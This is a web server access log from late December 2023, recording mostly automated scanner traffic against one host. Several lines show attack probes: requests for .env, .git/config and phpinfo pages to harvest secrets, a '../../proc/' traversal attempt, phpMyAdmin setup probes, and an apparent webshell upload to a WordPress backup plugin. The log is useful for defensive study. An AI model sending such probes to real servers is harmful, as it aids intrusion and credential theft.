91.92.242.207 - - [26/Dec/2023:10:56:18 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)" 91.92.243.232 - - [26/Dec/2023:11:11:02 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [26/Dec/2023:11:11:08 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

185.180.143.138 - - [26/Dec/2023:11:36:15 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

162.243.134.28 - - [26/Dec/2023:12:10:15 -0600] "GET /ReportServer HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

185.224.128.191 - - [26/Dec/2023:12:40:53 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

107.170.248.23 - - [26/Dec/2023:12:55:25 -0600] "GET /druid/index.html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

45.227.254.48 - - [26/Dec/2023:13:00:25 -0600] "\x03" 400 0 "-" "-"

192.241.218.12 - - [26/Dec/2023:14:06:22 -0600] "GET /ReportServer HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

84.54.51.41 - - [26/Dec/2023:14:18:01 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

20.150.201.61 - - [26/Dec/2023:14:25:34 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [26/Dec/2023:14:25:36 -0600] "GET /api/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [26/Dec/2023:14:25:38 -0600] "GET /laravel/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"

185.224.128.191 - - [26/Dec/2023:14:30:11 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

35.216.190.15 - - [26/Dec/2023:16:57:53 -0600] "\x16\x03\x01" 400 0 "-" "-" 35.216.190.15 - - [26/Dec/2023:16:57:53 -0600] "GET / HTTP/1.1" 400 0 "-" "-" 35.216.190.15 - - [26/Dec/2023:16:57:53 -0600] "GET / HTTP/1.1" 200 260 "-" "abuse.xmco.fr" 35.216.190.15 - - [26/Dec/2023:16:57:53 -0600] "GET /config.json HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 35.216.190.15 - - [26/Dec/2023:16:57:54 -0600] "GET /.env HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 35.216.190.15 - - [26/Dec/2023:16:57:54 -0600] "GET /telescope/requests HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 35.216.190.15 - - [26/Dec/2023:16:57:54 -0600] "GET /info.php HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 35.216.190.15 - - [26/Dec/2023:16:57:54 -0600] "GET /.git/config HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 35.216.190.15 - - [26/Dec/2023:16:57:55 -0600] "GET /server-status HTTP/1.1" 403 457 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"

20.150.201.61 - - [26/Dec/2023:17:14:03 -0600] "GET /_profiler/phpinfo HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

205.210.31.38 - - [26/Dec/2023:17:21:05 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.38 - - [26/Dec/2023:17:21:05 -0600] "\x16\x03\x01" 400 0 "-" "-"

45.142.182.76 - - [26/Dec/2023:17:26:25 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

159.223.136.180 - - [26/Dec/2023:18:20:10 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"

177.101.128.226 - - [26/Dec/2023:18:22:49 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

103.149.192.130 - - [26/Dec/2023:19:26:02 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"

84.54.51.108 - - [26/Dec/2023:19:27:05 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"

35.187.98.121 - - [26/Dec/2023:20:48:27 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

54.198.248.63 - - [26/Dec/2023:21:05:38 -0600] "GET /99vt HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

83.97.73.87 - - [26/Dec/2023:21:41:20 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

193.106.29.122 - - [26/Dec/2023:22:02:23 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0"

185.224.128.191 - - [26/Dec/2023:22:03:58 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

83.97.73.87 - - [26/Dec/2023:22:23:47 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

185.189.182.234 - - [26/Dec/2023:23:26:47 -0600] "GET / HTTP/1.1" 400 0 "-" "-"

December 27, 2023

192.241.237.41 - - [27/Dec/2023:00:22:35 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

143.110.212.2 - - [27/Dec/2023:01:52:50 -0600] "GET /.env HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

205.210.31.239 - - [27/Dec/2023:02:09:03 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

64.62.197.33 - - [27/Dec/2023:02:19:11 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 64.62.197.34 - - [27/Dec/2023:02:21:00 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 64.62.197.33 - - [27/Dec/2023:02:21:49 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

177.131.121.43 - - [27/Dec/2023:02:26:04 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

118.26.39.151 - - [27/Dec/2023:02:26:10 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

106.75.98.106 - - [27/Dec/2023:02:30:13 -0600] "USER anonymous" 400 0 "-" "-"

35.203.211.248 - - [27/Dec/2023:03:00:37 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

178.72.81.53 - - [27/Dec/2023:03:51:04 -0600] "POST /HNAP1/ HTTP/1.0" 400 486 "-" "-"

139.59.9.21 - - [27/Dec/2023:03:57:36 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"

87.236.176.175 - - [27/Dec/2023:04:40:17 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"

94.102.61.10 - - [27/Dec/2023:06:14:03 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

198.199.102.108 - - [27/Dec/2023:07:20:40 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

65.49.1.98 - - [27/Dec/2023:07:35:49 -0600] "\x16\x03\x01" 400 0 "-" "-"

185.224.128.191 - - [27/Dec/2023:07:56:31 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

31.220.88.155 - - [27/Dec/2023:09:16:54 -0600] "\x16\x03\x01\x01\xc0\x01" 400 0 "-" "-"

85.209.11.108 - - [27/Dec/2023:09:32:37 -0600] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 400 0 "-" "Go-http-client/1.1" 85.209.11.108 - - [27/Dec/2023:09:32:38 -0600] "GET /wp-content/plugins/backup-backup/includes/sxt17ZG3I.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56"

31.220.88.155 - - [27/Dec/2023:09:44:39 -0600] "GET /admin/config.php HTTP/1.0" 404 454 "-" "xfa1"

209.191.192.102 - - [27/Dec/2023:11:05:57 -0600] "GET / HTTP/1.1" 200 297 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

198.199.97.39 - - [27/Dec/2023:12:25:09 -0600] "GET /manager/text/list HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

172.233.57.47 - - [27/Dec/2023:12:49:38 -0600] "\x16\x03\x01" 400 0 "-" "-" 172.233.57.47 - - [27/Dec/2023:12:49:42 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"

5.188.210.227 - - [27/Dec/2023:14:06:01 -0600] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 455 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"

206.189.120.50 - - [27/Dec/2023:15:38:39 -0600] "GET /aaa9 HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 206.189.120.50 - - [27/Dec/2023:15:38:44 -0600] "GET /aab8 HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 206.189.120.50 - - [27/Dec/2023:15:38:48 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

141.98.10.132 - - [27/Dec/2023:16:07:37 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

205.210.31.195 - - [27/Dec/2023:16:20:26 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.195 - - [27/Dec/2023:16:20:27 -0600] "\x16\x03\x01" 400 0 "-" "-"

190.60.109.187 - - [27/Dec/2023:16:39:03 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

167.248.133.50 - - [27/Dec/2023:16:53:16 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.50 - - [27/Dec/2023:16:53:16 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.248.133.50 - - [27/Dec/2023:16:53:16 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

146.190.84.249 - - [27/Dec/2023:17:01:01 -0600] "\x16\x03\x01" 400 0 "-" "-" 146.190.84.249 - - [27/Dec/2023:17:01:01 -0600] "\x16\x03\x01" 400 0 "-" "-" 146.190.84.249 - - [27/Dec/2023:17:01:01 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:02 -0600] "GET /form.html HTTP/1.1" 404 435 "-" "curl/8.1.2" 146.190.84.249 - - [27/Dec/2023:17:01:02 -0600] "GET /upl.php HTTP/1.1" 404 435 "-" "Mozilla/5.0" 146.190.84.249 - - [27/Dec/2023:17:01:03 -0600] "\x16\x03\x01" 400 0 "-" "-" 146.190.84.249 - - [27/Dec/2023:17:01:03 -0600] "GET /geoip/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:04 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:04 -0600] "GET /1.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:05 -0600] "GET /bundle.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:05 -0600] "GET /files/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:06 -0600] "GET /systembc/password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:06 -0600] "GET /password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 146.190.84.249 - - [27/Dec/2023:17:01:06 -0600] "GET /info.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

103.187.190.8 - - [27/Dec/2023:17:20:58 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 103.187.190.8 - - [27/Dec/2023:17:20:59 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 103.187.190.8 - - [27/Dec/2023:17:20:59 -0600] "GET /nmaplowercheck1703719259 HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.8 - - [27/Dec/2023:17:21:00 -0600] "GET /evox/about HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.8 - - [27/Dec/2023:17:21:00 -0600] "GET /HNAP1 HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.8 - - [27/Dec/2023:17:21:00 -0600] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.8 - - [27/Dec/2023:17:21:01 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 103.187.190.8 - - [27/Dec/2023:17:21:02 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 103.187.190.7 - - [27/Dec/2023:17:21:03 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" 103.187.190.7 - - [27/Dec/2023:17:21:04 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Go-http-client/1.1" 103.187.190.4 - - [27/Dec/2023:17:21:04 -0600] "\x16\x03\x01\x01 \x01" 400 0 "-" "-"

167.94.138.52 - - [27/Dec/2023:17:25:18 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.138.52 - - [27/Dec/2023:17:25:21 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.52 - - [27/Dec/2023:17:25:21 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.138.52 - - [27/Dec/2023:17:25:21 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

62.233.50.179 - - [27/Dec/2023:19:48:10 -0600] "\x03" 400 0 "-" "-"

64.62.197.79 - - [27/Dec/2023:20:11:52 -0600] "\x16\x03\x01" 400 0 "-" "-"

34.77.127.183 - - [27/Dec/2023:20:32:11 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

185.180.143.71 - - [27/Dec/2023:22:35:54 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

205.210.31.228 - - [27/Dec/2023:22:50:34 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

104.152.52.177 - - [27/Dec/2023:23:06:39 -0600] "GET / HTTP/1.0" 200 260 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"

59.183.6.6 - - [27/Dec/2023:23:09:18 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 59.183.6.6 - - [27/Dec/2023:23:09:18 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 59.183.6.6 - - [27/Dec/2023:23:09:18 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"

83.97.73.87 - - [27/Dec/2023:23:22:14 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

162.142.125.215 - - [27/Dec/2023:23:29:38 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 162.142.125.215 - - [27/Dec/2023:23:29:42 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.215 - - [27/Dec/2023:23:29:42 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 162.142.125.215 - - [27/Dec/2023:23:29:42 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

December 28, 2023

209.191.192.102 - - [28/Dec/2023:00:08:01 -0600] "GET / HTTP/1.1" 200 297 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

185.224.128.191 - - [28/Dec/2023:00:19:39 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

20.150.201.61 - - [28/Dec/2023:00:28:11 -0600] "GET /_profiler/phpinfo HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

83.97.73.87 - - [28/Dec/2023:00:30:53 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

178.62.78.125 - - [28/Dec/2023:00:59:01 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

35.203.210.114 - - [28/Dec/2023:01:52:19 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

141.98.7.187 - - [28/Dec/2023:01:56:58 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

64.62.197.134 - - [28/Dec/2023:02:27:41 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX)" 64.62.197.122 - - [28/Dec/2023:02:29:48 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 64.62.197.136 - - [28/Dec/2023:02:30:27 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX)"

143.255.242.199 - - [28/Dec/2023:02:36:32 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

185.224.128.191 - - [28/Dec/2023:02:46:16 -0600] "GET / HTTP/1.1" 200 260 "http://67.218.15.25:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"

159.89.35.130 - - [28/Dec/2023:02:51:54 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 159.89.35.130 - - [28/Dec/2023:03:08:51 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 159.89.35.130 - - [28/Dec/2023:03:08:51 -0600] "GET /favicon.ico HTTP/1.1" 404 490 "http://67.218.15.25/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"

62.233.50.179 - - [28/Dec/2023:03:20:29 -0600] "\x03" 400 0 "-" "-"

185.224.128.191 - - [28/Dec/2023:05:26:32 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

189.186.226.35 - - [28/Dec/2023:05:53:08 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

134.209.21.210 - - [28/Dec/2023:06:07:52 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

102.67.158.23 - - [28/Dec/2023:07:37:49 -0600] "\x16\x03\x01\x02" 400 0 "-" "-"

207.46.13.230 - - [28/Dec/2023:09:09:26 -0600] "GET /robots.txt HTTP/1.1" 404 491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"

52.167.144.182 - - [28/Dec/2023:09:09:29 -0600] "GET / HTTP/1.1" 304 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"

78.153.140.221 - - [28/Dec/2023:09:19:39 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.221 - - [28/Dec/2023:09:19:39 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

209.191.192.102 - - [28/Dec/2023:09:47:25 -0600] "GET / HTTP/1.1" 200 297 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

146.19.191.205 - - [28/Dec/2023:10:42:08 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

198.199.103.54 - - [28/Dec/2023:11:27:34 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

78.153.140.219 - - [28/Dec/2023:11:37:55 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.219 - - [28/Dec/2023:11:37:56 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

101.43.54.155 - - [28/Dec/2023:11:53:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:53:22 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:53:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:53:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:53:25 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:53:26 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:55:49 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:55:49 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:55:50 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 